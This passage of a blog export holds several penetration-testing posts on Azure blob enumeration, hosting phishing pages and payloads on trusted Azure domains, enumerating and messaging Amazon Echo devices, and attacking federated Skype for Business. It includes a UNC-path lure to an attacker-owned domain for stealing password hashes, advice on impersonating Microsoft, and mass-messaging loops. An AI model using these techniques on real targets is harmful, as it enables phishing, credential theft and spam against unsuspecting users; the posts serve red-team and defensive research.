One of the issues that we've seen within Azure environments is publicly exposing files through storage accounts. These issues are pretty similar to the issues that have come up around public S3 buckets (A good primer here). "Storage Accounts" are Microsoft's way of handling data storage in Azure. Each storage account has a unique subdomain assigned to it in the core.windows.net domain. For example, if I create the netspiazure storage account, I would have netspiazure.core.windows.net assigned to the account.


This subdomain structure also extends out to the different file types within the storage accounts
  • Blobs - netspiazure.blob.core.windows.net
  • File Services - netspiazure.file.core.windows.net
  • Data Tables - netspiazure.table.core.windows.net
  • Queues - netspiazure.queue.core.windows.net

Blobs

For the purpose of this blog, we're just going to focus on the "Blobs", but the other data types are also interesting. Blobs are Microsoft's unstructured data storage objects. Most frequently, we're seeing them used for serving static public data, but we have found blobs being used to store sensitive information (config files, database backups, credentials). Given that Google is indexing about 1.2 million PDFs from the Azure "blob.core.windows.net" subdomain, I think there's pretty decent surface area here.

Permissions

The blobs themselves are stored within "Containers", which are basically folders. Containers have access policies assigned to them, which determine the level of public access that is available for the files. If a container has a "Container" public access policy, then anonymous users can list and read any of the files that are in the container. The "Blob" public access policy still allows anonymous users to read files, but they can't list the container files. "Blob" permissions also prevent the basic confirmation of container names via the Azure Blob Service REST APIs.
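These access levels can be probed anonymously: a container-list request only succeeds under the "Container" policy, while a read of an individual blob succeeds under both public policies. As a rough illustration (not part of the MicroBurst script), here's a tiny Python helper that classifies a container from the two anonymous HTTP results, assuming a non-200 status on the list request when listing is denied:

```python
def classify_access(list_status, blob_status):
    """Map anonymous HTTP status codes to a container's apparent public access policy.

    list_status: status of GET https://<acct>.blob.core.windows.net/<container>?restype=container&comp=list
    blob_status: status of GET on a known blob URL inside the container
    """
    if list_status == 200:
        return "Container"    # anonymous listing and reads allowed
    if blob_status == 200:
        return "Blob"         # anonymous reads allowed, listing denied
    return "Private/Unknown"  # no anonymous access confirmed

print(classify_access(200, 200))  # -> Container
print(classify_access(404, 200))  # -> Blob
print(classify_access(404, 404))  # -> Private/Unknown
```

Note the middle case: with "Blob" permissions you need to already know (or guess) a blob name, since the list request won't confirm the container for you.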

Automation

Given the number of Azure environments that we've been running into, I wanted to automate our process for enumerating publicly available blob files. I'm partial to PowerShell, but this script could potentially be ported to other languages. Code for the script can be found on NetSPI's GitHub - https://github.com/NetSPI/MicroBurst At the core of the script, we're doing DNS lookups for blob.core.windows.net subdomains to enumerate valid storage accounts and then brute-force container names using the Azure Blob Service REST APIs. Additionally, the Bing Search API can be used within the tool to find additional storage accounts and containers that are already publicly indexed. Once a valid container name is identified, we use the Azure Blob APIs again to see if the container allows us to list files via the "Container" public access policy. To come up with valid storage account names, we start with a base name (netspi) and either prepend or append additional words (dev, test, qa, etc.) that come from a permutations wordlist file. The general idea for this script along with parts of the permutations list comes from a similar tool for AWS S3 buckets - inSp3ctor
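The container brute-force step boils down to generating anonymous list-request URLs for every account/container combination. A simplified Python version of the URL generation (the account and container word lists here are illustrative; the endpoint format matches the Blob Service REST API calls shown in the sample output below):

```python
def container_probe_urls(accounts, containers):
    """Build the anonymous container-list URLs used to brute-force container names."""
    for account in accounts:
        for container in containers:
            yield (f"https://{account}.blob.core.windows.net/"
                   f"{container}?restype=container&comp=list")

urls = list(container_probe_urls(["netspi", "netspidev"], ["files", "docs"]))
print(urls[0])
# -> https://netspi.blob.core.windows.net/files?restype=container&comp=list
```

Each URL can then be requested anonymously; a successful response both confirms the container name and returns the file listing when the "Container" access policy is set.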

Invoke-EnumerateAzureBlobs Usage

The script has five parameters:
  • Base - The base name that you want to run permutations on (netspi)
  • Permutations - The file containing words to use with the base to find the storage accounts (netspidev, testnetspi, etc.)
  • Folders - The file containing potential folder names that you want to brute force (files, docs, etc.)
  • BingAPIKey - The Bing API Key to use for finding additional public files
  • OutputFile - The file to write the output to
Example Output:
PS C:\> Invoke-EnumerateAzureBlobs -Base secure -BingAPIKey 12345678901234567899876543210123
Found Storage Account -  secure.blob.core.windows.net
Found Storage Account -  testsecure.blob.core.windows.net
Found Storage Account -  securetest.blob.core.windows.net
Found Storage Account -  securedata.blob.core.windows.net
Found Storage Account -  securefiles.blob.core.windows.net
Found Storage Account -  securefilestorage.blob.core.windows.net
Found Storage Account -  securestorageaccount.blob.core.windows.net
Found Storage Account -  securesql.blob.core.windows.net
Found Storage Account -  hrsecure.blob.core.windows.net
Found Storage Account -  secureit.blob.core.windows.net
Found Storage Account -  secureimages.blob.core.windows.net
Found Storage Account -  securestorage.blob.core.windows.net
Bing Found Storage Account - notrealstorage.blob.core.windows.net
Found Container - hrsecure.blob.core.windows.net/NETSPItest
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/SuperSecretFile.txt
    Public File Available: https://hrsecure.blob.core.windows.net/NETSPItest/TaxReturn.pdf
Found Container - secureimages.blob.core.windows.net/NETSPItest123
    Empty Public Container Available: https://secureimages.blob.core.windows.net/NETSPItest123?restype=container&comp=list
By default, both the "Permutations" and "Folders" parameters are set to the permutations.txt file that comes with the script. You can increase your chances of finding files by adding any client/environment-specific terms to that file.

Adding in a Bing API Key will also help find additional storage accounts that contain your base word. If you don't already have a Bing API Key set up, navigate to the "Cognitive Services" section of the Azure Portal and create a new "Bing Search v7" instance for your account. There's a free pricing tier that will get you up to 3,000 calls per month, which will hopefully be sufficient.

If you are using the Bing API Key, you will be prompted with an Out-GridView selection window to select any storage accounts that you want to look at. There are a few publicly indexed Azure storage accounts that seem to hit on most company names. These accounts seem to be indexing documents for or data on multiple companies, so they have a tendency to frequently show up in your Bing results. Several of these accounts also have public file listing, so that may give you a large list of public files that you don't care about.

Either way, I've had pretty good luck with the script so far, and hopefully you do too. If you have any issues with the script, feel free to leave a comment or pull request on the GitHub page.
[post_title] => Anonymously Enumerating Azure File Resources [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => anonymously-enumerating-azure-file-resources [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:54:42 [post_modified_gmt] => 2021-06-08 21:54:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=9319 [menu_order] => 586 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [42] => WP_Post Object ( [ID] => 8846 [post_author] => 10 [post_date] => 2018-05-22 07:00:11 [post_date_gmt] => 2018-05-22 07:00:11 [post_content] =>

Everything seems to be moving into the cloud, so why not move your red team infrastructure there too. Well… lots of people have already been doing that (see here), but what about using hosted services from a cloud provider to hide your activities within the safety of the provider’s trusted domains? That’s something that we haven’t seen as much of, so we decided to start investigating cloud services that would allow us to make use of subdomains from trusted domains.

There are multiple options for cloud providers, so for starters we will be just looking at Microsoft's Azure services. Each cloud provider offers similar services, so you may be able to apply these techniques to other providers.

Domain Reputation Overview

Given that Domain Fronting is kind of on its way out, we wanted to find alternative ways to use trusted domains to bypass filters. One of the benefits of using Azure cloud services for red team engagements is the inherent domain reputation that comes with the domains that are hosting your data (Phishing sites, Payloads, etc.).

To be specific here, these are services hosted by Microsoft that are typically hosted under a Microsoft sub-domain (windows.net, etc.). By making use of a domain that’s already listed as “Good”, we can hopefully bypass any web proxy filters as we work through an engagement.

This is not a comprehensive list of the Azure services and corresponding domains, but we looked at the Talos reputation scores for some of the primary services. These scores can give us an idea of whether or not a web proxy filter would consider our destination domain as trusted. Each Azure domain that we tested came in as Neutral or Good, so that works in our favor.

Service      | Base Domain            | Base Web Reputation | Base Weighted Reputation | Subdomain Web Reputation | Subdomain Weighted Reputation
App Services | azurewebsites.net      | Neutral             | No Score                 | Neutral                  | No Score
Blob Storage | blob.core.windows.net  | Good                | Good                     | Good                     | Good
File Service | file.core.windows.net  | Good                | Good                     | Good                     | Good
AzureSQL     | database.windows.net   | Good                | Good                     | Good                     | Good
Cosmos DB    | documents.azure.com    | Neutral             | Neutral                  | Neutral                  | Neutral
IoT Hub      | azure-devices.net      | Neutral             | No Score                 | Neutral                  | No Score

Note: We also looked at the specific subdomains that were attached to these Azure domains and included their reputations in the last two columns. All subdomains were created fresh and did not get seasoned prior to reputation checking. If you’re looking for ways to get your domain trusted by web proxies, take a look at Ryan Gandrud’s post – Adding Web Content Filter Exceptions for Phishing Success.

For the purposes of this blog, we're just going to focus on the App Services, Blob Storage, and AzureSQL services, but there are plenty of opportunities in the other services for additional research.

Hosting Your Phishing Site

The Azure App Services domains scored Neutral or No Score, but there’s one great benefit to hosting your phishing site with Azure App Services - the SSL certificate. When you use the default options for spinning up an App Services “Web App”, you will be issued an SSL certificate for the site that is verified by Microsoft.


Now I would never encourage someone to pretend to be Microsoft, but I hear that it works pretty well for phishing exercises. One downside here is that the parent domain (azurewebsites.net) isn’t the most well-known domain on the internet and might raise some flags from people looking at the URL.

*This is also probably against the Azure terms and conditions, so insert your standard disclaimer here.

**Update: After posting this blog, my test site changed the ownership information on the SSL certificate (after ~5 days of uptime), so your mileage may vary.

As a security professional, I would probably take issue with that domain, but with a Microsoft verified certificate, I might have less apprehension. When the service was introduced, ZDNet actually called it “phishing-friendly”, but as far as we could find, it hasn’t really been adopted for red team operations.

The setup of an Azure App Services “Web App” is really straightforward and takes about 10 minutes total (assuming your phishing page code is all ready to go).

Check out the Microsoft documentation on how to set up your first App Services Web App here - https://docs.microsoft.com/en-us/azure/app-service/app-service-web-overview

Or just try it out on the Azure Portal – https://portal.azure.com

Storing Your Payloads

Setting up your payload delivery is also easy within Azure. Similar to the AWS S3 service, Microsoft has their own public HTTP file storage solution called Blob Storage. Blobs can be set up under a “Storage Account” using a unique name. The unique naming is due to the fact that each Blob is created as a subdomain of the “blob.core.windows.net” domain.


For example, any payloads stored in the “notpayloads” blob would be available at https://notpayloads.blob.core.windows.net/. We also found that these domains already had a “Good” reputation, so it makes them a great option for delivering payloads. If you can grab a quality Blob name (updates, photos, etc.), this will also help with the legitimacy of your payload URL.

I haven’t done extensive testing on long term storage of payloads in blobs, but a 2014 version of Mimikatz was not flagged by anything on upload, so I don’t think that should be an issue.

Setting up Blob storage is also really simple. Just make sure that you set your Blob container “Access policy” to “Blob” or “Container” to allow public access to your payloads.
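If you want to quickly verify that a container is actually exposed, an anonymous listing request will tell you. Here's a rough Python sketch (the account and container names are made up, and the listing call obviously needs network access):

```python
import urllib.request
import urllib.error

def container_list_url(account, container):
    # Anonymous listing only works when the container access policy is
    # "Container"; the "Blob" policy allows reads of known blob URLs only.
    return (f"https://{account}.blob.core.windows.net/"
            f"{container}?restype=container&comp=list")

def is_publicly_listable(account, container, timeout=5):
    try:
        with urllib.request.urlopen(container_list_url(account, container),
                                    timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.URLError:  # covers HTTPError too
        return False
```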

If you need a primer, check out Microsoft’s documentation here - https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction

Setting Up Your C2 in Azure

There are several potential options for hosting your C2 infrastructure in Azure, but as a companion to this blog, Scott Sutherland has written up a method for using AzureSQL as a C2 option. He will be publishing that information on the NetSPI blog later this week.

Conclusions / Credits

You may not want to move the entirety of your red team operations to the Azure cloud, but it may be worth using some of the Azure services, considering the benefits that you get from Microsoft’s trusted domains. For the defenders that are reading, you may want to keep a closer eye on the traffic that's going through the domains that we listed above. Security awareness training may also be useful in helping prevent your users from trusting an Azure phishing site.

Special thanks to Alexander Leary for the idea of storing payloads in Blob Storage, and Scott Sutherland for the brainstorming and QA help.

[post_title] => Utilizing Azure Services for Red Team Engagements [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => utiilzing-azure-for-red-team-engagements [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:53:42 [post_modified_gmt] => 2021-06-08 21:53:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=8846 [menu_order] => 593 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [43] => WP_Post Object ( [ID] => 7688 [post_author] => 10 [post_date] => 2017-11-20 07:00:45 [post_date_gmt] => 2017-11-20 07:00:45 [post_content] => Amazon recently introduced messaging and calling between Echo devices. This allows Echo device owners to communicate to each other via text messages, audio recordings, and voice calls. It’s pretty handy for leaving someone a short note, or for a quick call, but as a hacker, I was more curious about the potential security issues associated with these new features. There have already been a couple of articles recently published that deal with some of the privacy concerns about the features, so we will be going deeper into the technical side of things for this post.

Enumerating Echoes

The “Amazon Alexa” mobile application can take in your phone's contact list and look up potential call contacts via their phone number. I was finding a surprising number of Echoes in my contact list, so I figured the next step would be to try enumerating Echoes that were not (yet) in my contact list. In order to do this, I needed to import new contacts into my phone with the phone numbers that I wanted to check for Echo devices. Creating the contacts was pretty simple using some Excel magic and the CSV contact import function in Gmail. So I fired up my throwaway Gmail account and added the entire 612-555-XXXX range (10,000 numbers) into my contacts list. For the privacy of the numbers listed below, I’ve changed the second set of numbers in the range to 555. To keep track of each number that I imported, I set the last name to “Test 1234”, where 1234 was the last four digits of the number that I was trying. Taking this route, I was able to identify 65 Echo devices in my phone number’s exchange range.
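If you'd rather script the contact generation than fight with Excel, here's a rough Python sketch that builds an importable CSV (the column headers are my assumption of what Google's contact import expects, and the number range is an example):

```python
import csv
import io

def contact_rows(prefix="+1612555", count=10000):
    # One contact per number in the 612-555-XXXX range; the last four
    # digits go into the last name so each hit can be tracked later.
    for i in range(count):
        last4 = f"{i:04d}"
        yield {"Given Name": "Echo",
               "Family Name": f"Test {last4}",
               "Phone 1 - Value": f"{prefix}{last4}"}

buf = io.StringIO()
writer = csv.DictWriter(buf, fieldnames=["Given Name", "Family Name",
                                         "Phone 1 - Value"])
writer.writeheader()
writer.writerows(contact_rows())
# buf.getvalue() can now be written to a .csv file and imported into Gmail
```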


Given that I was only able to find 65 Echo devices (of the more than 11 million sold), I guess that my number’s range isn’t very active. Google’s upper limit of contacts is 25,000 (Source), so I could potentially cover 2.5 ranges at once with one Gmail account. Given that there are 1,117 exchange ranges in the Minneapolis 612 area code (Source), it would take 447 rounds of this method to cover all of the 612 ranges. Alternatively, you could potentially add additional Google accounts to your phone and cut down the number of contact upload rounds. Please keep in mind that Amazon is monitoring for massive contact uploads, so don't try this at home.

Side Note: For all of the following examples, I proxied the Alexa iOS application traffic through Burp Suite Professional, using an SSL certificate that was trusted by my device.

Once an Echo device is added to your Amazon contact list, you will be able to see that the contact will have a specific Amazon ID tied to their account. These 28-character, alpha-numeric IDs are used with the APIs for interacting with other Echo devices. Here is one of the records that would be returned from my contacts list.
HTTP/1.1 200 OK
Server: Server
Date: Wed, 31 May 2017 23:12:58 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding,User-Agent
Content-Length: 63644

[{"name":{"firstName":"Karl","lastName":"Fosaaen"},"numbers":[{"number":"+1612[REDACTED]","type":"Mobile"}],"number":"+1612[REDACTED]","id":"bf[REDACTED]88","deviceContactId":null,"serverContactId":"bf[REDACTED]88","alexaEnabled":true,"isHomeGroup":false,"isBulkImport":false,"isBlocked":null,"sourceDeviceId":null,"sourceDeviceName":null,"commsId":["amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"],"commsIds":[{"aor":"sips:id.person.amzn1~amzn1.account.MY_AMAZON_ID@amcs-tachyon.com","id":"amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"}],"homeGroupId":null,"commsIdsPreferences":{"amzn1.comms.id.person.amzn1~amzn1.account. MY_AMAZON_ID":{"preferenceGrantedToContactByUser":{},"preferenceGrantedToUserByContact":{}}}},[Truncated]
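Pulling the Amazon IDs out of that response is simple once you have the JSON. Here's a rough Python sketch of the parsing step (the sample below is a trimmed, fake version of the response above):

```python
import json

# Trimmed, fake version of the contacts response shown above
sample = '''[
  {"name": {"firstName": "Karl", "lastName": "Fosaaen"},
   "number": "+16125550123", "alexaEnabled": true,
   "commsId": ["amzn1.comms.id.person.amzn1~amzn1.account.MY_AMAZON_ID"]},
  {"name": {"firstName": "No", "lastName": "Echo"},
   "number": "+16125550124", "alexaEnabled": false, "commsId": null}
]'''

def echo_contacts(payload):
    # Keep only contacts with Alexa enabled and grab their Amazon IDs
    return [(c["number"], c["commsId"][0])
            for c in json.loads(payload)
            if c.get("alexaEnabled") and c.get("commsId")]
```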

Sending Text Messages

By proxying the iOS application traffic, we can also see the protocol used for creating text and audio messages. The protocol is pretty simple. Here’s the POST request that we would use to generate a new text message to the “THE_RECIPIENT_ID” user that we would have previously enumerated.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: [Truncated]
Content-Type: application/json
X-Amzn-RequestId: [Truncated]
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 170
Accept-Language: en-us

[{"payload":{"text":"Hey. This is Karl. I'm testing some Amazon stuff. I promise I won't spam you over this. "},"time":"2017-05-31T23:17:20.863Z","type":"message/text"}]
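The message body itself is just a small JSON array. Here's a rough Python sketch of building one (the field names come straight from the proxied request above; the timestamp formatting is my approximation of what the app sends):

```python
import json
from datetime import datetime, timezone

def text_message_body(text):
    # The endpoint takes a JSON array of message objects; the timestamp
    # format mirrors the proxied request above (ISO-8601 with milliseconds).
    now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"
    return json.dumps([{"payload": {"text": text},
                        "time": now,
                        "type": "message/text"}])
```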

Sending Audio Messages

The audio side of things is a little different. First you have to upload your audio file (which you can overwrite with a proxy), then you send someone a link to the audio file. Here’s what the upload request and response would look like.

HTTP POST Request:
POST /v1/media?include-transcript=true HTTP/1.1
Host: project-wink-mss-na.amazon.com
Accept: */*
Authorization: [Truncated]
Accept-Language: en-us
Content-Type: audio/aac
X-Authorization-Act-As: amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID
Content-Length: 39881
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Connection: close
X-Amzn-RequestId: 82DFDC97-65AE-4379-AE2D-77261AD13191
X-Total-Transfer-Length: 99150

[Truncated m4a audio file to be uploaded]
HTTP Server Response:
HTTP/1.1 201 Created
Server: Server
Date: Wed, 31 May 2017 23:26:01 GMT
Content-Type: application/json
Connection: close
Location: https://project-wink-mss-na.amazon.com/v1/media/arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT
Vary: Accept-Encoding,User-Agent
Content-Length: 170

{"id":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0. RD02REDACTEDCOT","transcript":null,"transcriptStatus":null}
The "id" above can then be used for an audio message, in a request that looks like this.
POST /users/amzn1.comms.id.person.amzn1~amzn1.account.YOUR_AMAZON_SOURCEID/conversations/amzn1.comms.id.person.amzn1~amzn1.account.THE_RECIPIENT_ID/messages HTTP/1.1
Host: alexa-comms-mobile-service-na.amazon.com
X-Amzn-ClientId: DEF9FF9C-86EC-4C2E-BFFB-8C6D2A601D31
Content-Type: application/json
X-Amzn-RequestId: 9F4439B8-66FB-496B-820F-E7A96089F588
Accept: */*
Connection: close
Cookie: [Truncated]
User-Agent: Amazon Alexa/2.0.2478/1.0.2992.0/iPhone8,1/iOS_10.3.2
Content-Length: 205
Accept-Language: en-us

[{"payload":{"mediaId":"arn:alexa:messaging:na::mediastorageservice:amzn1.tortuga.2.07ec8e8a-652a-46a7-8fe2-968980e1d8d0.RD02REDACTEDCOT"},"time":"2017-05-31T22:50:06.005Z","type":"message/audio"}]
At this point, the audio message will be delivered to the recipient in the mobile app, or the Echo will let the recipient know there’s a new message.

Next Steps

So at this point, we’ve enumerated a city’s worth of Echo devices, figured out how to send text and audio messages to all of them, and we have a moral obligation to do the right thing. In the spirit of the last item, I've been in contact with the Amazon security team about this and they've been really great to work with on the disclosure process. They have already implemented some controls to prevent abuse with these features, and I'm looking forward to diving into the next set of features that they add to the Echo devices. [post_title] => Speaking to a City of Amazon Echoes [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => speaking-to-a-city-of-amazon-echoes [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:52:01 [post_modified_gmt] => 2021-06-08 21:52:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=7688 [menu_order] => 611 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [44] => WP_Post Object ( [ID] => 6445 [post_author] => 10 [post_date] => 2016-07-21 07:00:21 [post_date_gmt] => 2016-07-21 07:00:21 [post_content] => Federated Skype for Business is a handy way to allow businesses to communicate with each other over a common instant messaging platform. From a security standpoint, the open exchange of information between businesses is a little concerning. NetSPI first started running into instances of federated Skype for Business (at that time Lync) about two years ago. We had opened up federation on our Skype setup and found that we could IM with some of our clients. We also found out that we could see their current availability. This was a little concerning to me at the time, but I was busy, so I didn’t look into it. I was finally able to really start digging into Skype federation last fall and it’s been a really interesting research subject.

The Basics

Skype federation works by setting up an internet-facing federated endpoint that allows outside domains to connect and send messages through to another domain. Basically, Business A can talk to Business B if both of them have the proper federation set up. There are a couple of ways that you can set up federation, but most of the domains that we’ve run into so far just have open federation enabled. You can restrict it by domain, but I have not seen that implemented as frequently. Being able to Skype chat with clients and other businesses could be handy, but what can we do with this as pen testers? For starters:
  • Validate email addresses
  • Get Skype availability and Out-of-Office statuses
  • Send phishing messages via Skype

Setting up Your Test Environment

Since you may not have federated Skype for Business (or Lync) at your disposal, and you probably don’t want to set up a server for yourself (I’ve heard it’s rough), you can just go to the cloud. This may sound like a plug for Microsoft services, but they are a reasonably priced option for testing this stuff out. You can go month to month ($6/month) or commit to a full year ($5/month) and get federated Skype for Business services direct from Microsoft (See Here). If you only need it for an engagement, it’s easy to fire up for a month.

You will have to specifically enable domain federation through the web interface: go to the Skype for Business admin center, select organization, and change the external access to “On except for blocked domains”. Check the “public IM connectivity” box as well.

Once you have a federated Skype for Business domain set up, you just need the Skype for Business client (available on the Microsoft Office Portal) installed on your machine to start poking around. Let’s take a look at a sample domain. Here’s what we see when we try to communicate with an email address that is not federated with Skype.

We can see that the email address is listed in full and we get "Presence unknown" for the current status. Here’s what a live federated email address will look like. (Note the Full Name, Job Title, and Status)

Here’s what it looks like when I open up conversations with a bunch of CEOs from other federated companies. So we have a full name, job title, and current status. This is handy for one-off targeting of individuals, but what if we want to target a larger list? We can use the Lync SDK and some PowerShell to do that.

The Lync (Skype for Business) SDK

This can be kind of a pain to set up properly, so follow these steps. I know Visual Studio 2010 is old, but it’s the easiest way to get the Lync SDK to work. I’ve gone through this on a Windows 10 VM and had no issues; if you run into any, feel free to leave a comment.

Once you have the SDK installed, we can start wrapping the SDK functions with PowerShell to automate our attacks. I’ve put together a few functions (outlined below) that we can use to start attacking these federated Skype for Business interfaces. Get the module here: https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1

All of these functions should be working, and there are a few more on the way (along with better documentation). Feel free to comment on the GitHub page with any feedback. If you have issues importing the Lync SDK DLL, do a search on your system for "Microsoft.Lync.Model.dll" and change your path in the module. If you followed the steps above, it should be in the default path.

Overview of Module Functions

Validate an email and get its status - Single Email
Get-SkypeStatus -email test@example.com

Email         : test@example.com
Title         : Chief Example Officer
Full Name     : Testing McTestface
Status        : Available
Out Of Office : False

*Side note - Since there is sometimes a federation delay, you may not get a user's status back immediately. It helps to run the function a couple of times (2-3), which can be done with the "attempts" flag. You may end up with duplicates if you do multiple attempts, but you'll probably have better coverage.

Validate emails and get statuses - List Input
Get-SkypeStatus -inputFile C:\Temp\emails.txt | ft -auto

Email                       Title          Full Name   Status        Out Of Office
-----                       -----          ---------   ------        -------------
FakeName1@example.com      Consultant      FakeName 1  Away          False       
FakeName2@example.com      Accountant      FakeName 2  Away          False       
FakeName3@example.com      Intern          FakeName 3  Away          False       
FakeName4@example.com      Lead Intern     FakeName 4  Out of Office True        
FakeName5@example.com      Associate       FakeName 5  Available     False       
FakeName6@example.com      Somebody        FakeName 6  Offline       False       
FakeName7@example.com      Senior Somebody FakeName 7  Offline       False      
FakeName8@example.com      Marketing Guru  FakeName 8  Away          False       
FakeName9@example.com      IT “Engineer”   FakeName 9  Offline
Send a message - Single User
Invoke-SendSkypeMessage -email test@example.com -message "Hello World"
Sent the following message to test@example.com:
Hello World
Send a message - Multiple Users
get-content emails.txt | foreach {Invoke-SendSkypeMessage -email $_ -message "Hello World"}
Sent the following message to test@example.com:
Hello World

Sent the following message to test2@example.com:
Hello World
*If you don't feel like piping get-content, you can just use the "inputFile" parameter here as well.

Start a group message
Invoke-SendGroupSkypeMessage -emails "test@example.com, test1@example.com" -message "testing"
Sent the following message to 2 users:
testing

*You can also use an input file here as well.

Send a million messages**
for ($i = 0; $i -lt 1000000; $i++){Invoke-SendSkypeMessage -email test@example.com -message "Hello $i"}
Sent the following message to test@example.com:
Hello 0
Sent the following message to test@example.com:
Hello 1
Sent the following message to test@example.com:
Hello 2
Sent the following message to test@example.com:
Hello 3
...
**For the record, Skype will probably not be happy with you if you try to open a million conversations. My Skype client starts crashing when it takes up around 1.5 GB of memory.

Current Exposure

So how big of an exposure is this? Since I see federation pretty regularly with our clients, I decided to go out and check the internet for other domains that support Skype federation. There are a couple of ways that we can identify potential federated Skype for Business domains. We’ll start with the Alexa top 1 million list and work down from there. First, we’ll see which domains have the ms=ms12345678 records. These are commonly placed in DNS TXT records so that Microsoft can validate the domain that is being federated.

47,455 of the top 1 million have “ms=ms*” records

Next we’ll take a look at how many of those "MS" domains have SIP or Microsoft federation specific SRV records enabled.

_sip._tcp.example.com -  9,395 Records

_sip._tls.example.com - 28,719 Records

_sipfederationtls._tcp.example.com - 28,537 Records

Taking a unique list of the domains from each of those lists, we end up with 29,551 domains. Now we can try to send messages to the “Administrator” (Default Domain Admin) Skype address.
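If you want to script the TXT-record triage yourself, the matching step is simple. Here's a rough Python sketch of the filter (record values shown are examples; the actual DNS lookups, e.g. via dig or Resolve-DnsName, are left out):

```python
import re

# Microsoft domain-validation TXT records look like "ms=ms12345678"
MS_VERIFICATION = re.compile(r"^ms=ms\d+$", re.IGNORECASE)

def has_ms_record(txt_values):
    # True if any TXT record value for the domain is an ms=ms* record
    return any(MS_VERIFICATION.match(v.strip()) for v in txt_values)
```

Domains that pass this filter are the ones worth checking for the _sip and _sipfederationtls SRV records.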

45 Domains with the “Administrator” account registered on Skype for Business

I'm sure that there are plenty of domains in the list with renamed Administrator accounts and many others that also do not have a Skype user set up for that account, but this is still an interesting number of domain admins that are somewhat exposed.

Further Attacks

As you can see, there’s some decent surface area here to start attacking. My current favorite thing to send is UNC paths. Sending someone \\www.microsoftsupport.online\help looks somewhat legitimate and happens to send a Skype user’s hash (if they click on it) directly to your attacking system (assuming you own microsoftsupport.online). Once you crack that hash, there's a good chance that the organization has auto-discovery set up for global Skype access. Just log in to Skype for Business with your cracked credentials and start saying hello to your new co-workers. Some other options:
  • Want some extra time to run your attack? Wait until the entire SOC team is “Away” or “In a Meeting” and fire away.
  • Need an audience? How about a group meeting with everyone (up to 250 users - source) in an organization at the same time?
  • Need to find an office to use for the day during onsite social engineering? Find the person who’s out of office for the day and set up shop in their spot.

Final Notes

For the defenders that are reading this, you should probably set up limitations on who you federate with. An overview of the different types of federation can be found here. Additionally, you may want to see if federation really makes sense for your organization.

Sources

Note: There is some really great prior work that was done by Jason Ostrom, Karl Feinauer, and William Borskey that they presented at DEF CON 20. Take a look at their talk on YouTube or their slides. [post_title] => Attacking Federated Skype for Business with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-federated-skype-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:29 [post_modified_gmt] => 2021-06-08 21:47:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6445 [menu_order] => 648 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [45] => WP_Post Object ( [ID] => 6298 [post_author] => 10 [post_date] => 2016-05-03 07:00:08 [post_date_gmt] => 2016-05-03 07:00:08 [post_content] => The Economy of Mechanism - Office365 SAML assertions vulnerability popped up on my radar this week and it’s been getting a lot of attention. The short version is that you could abuse the SAML authentication mechanisms for Office365 to access any federated domain. It’s a really serious and interesting issue that you should totally read about, if you haven't already. I have a feeling that this will bring more attention to domain federation attacks and hopefully some new research into the area. Since I’m currently working on some ADFS research (and had this written), I figured now was a good time to release a simple PowerShell tool to enumerate ADFS endpoints using Microsoft’s own APIs. The SAML assertions blog post mentions using this same method to identify federated domains through Microsoft. 
I’ve wrapped it in PowerShell to make it a little more accessible. This tool should be handy for external pen testers that want to enumerate potential authentication points for federated domain accounts.

Office365 Authentication

If you are trying to authenticate to the Office365 website, Microsoft will do a lookup to see if your email account has authentication managed by Microsoft, or if it is tied to a specific federation server. This can be seen if you proxy your traffic while authenticating to the Office365 portal. Here’s an example request from the client with an email address to check.
GET /common/userrealm/?user=karl@example.com&api-version=2.1&checkForMicrosoftAccount=true HTTP/1.1
Host: login.microsoftonline.com
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
You will get one of two JSON responses back from Microsoft:
  1. A response for a federated domain server endpoint:
    {
      "MicrosoftAccount":1,
      "IsDomainVerified":0,
      "NameSpaceType":"Federated",
      "federation_protocol":"WSTrust",
      "Login":"karl@example.com",
      "AuthURL":"https://adfs.example.com/adfs/ls/?username=karl%40example.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=",
